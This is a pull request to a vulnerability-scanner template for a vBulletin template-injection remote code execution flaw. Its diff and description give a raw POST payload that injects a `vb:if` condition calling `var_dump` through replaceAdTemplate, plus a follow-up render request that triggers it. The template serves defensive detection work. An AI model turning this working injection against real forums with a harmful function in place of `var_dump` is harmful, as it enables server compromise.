### PR TITLE
Update vbulletin-replacead-rce.yaml

### DIFF
--- a/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
@@ -36,12 +36,23 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>
-
     matchers:
       - type: dsl
         dsl:
-          - contains(content_type,'application/json')
-          - contains_all(body,'string(5)','{{rand_value}}')
           - status_code == 200
+          - contains_all(body,'string(5)','{{rand_value}}')
         condition: and
-# digest: 4a0a00473045022039d5fe53f2231bbabadaf62fc548eedf67c6fbffc543aa29a6e96fcd690d9f3d022100a7d55e33136c01b5c3bbbe57691e3cddbc419cba3c4fcf24c313d1e3fe71795b:922c64590222798bb761d5b6d8e72950
+
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        routestring=ajax/render/ad_{{rand_string}}
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains_all(body,'string(5)','{{rand_value}}')
+        condition: and


### PR DESCRIPTION
### Template / PR Information

Relying on `Content-Type: application/json` to detect the vulnerability is unreliable, because many vBulletin installations, especially across different 5.x and early 6.x versions return HTML. In some builds the initial `ajax/api/ad/replaceAdTemplate` call may inject the `<vb:if>` correctly but won't echo your `var_dump` result in its response, so your scanner appears to miss the issue. By following up with a second POST to `ajax/render/ad_<location>`, you force the template to be rendered and can reliably capture the `string(<length>) "<value>"` output, regardless of whether the first response looked like JSON or HTML. This approach ensures you don't miss exploitable instances simply because the server hides its output behind an unexpected content type.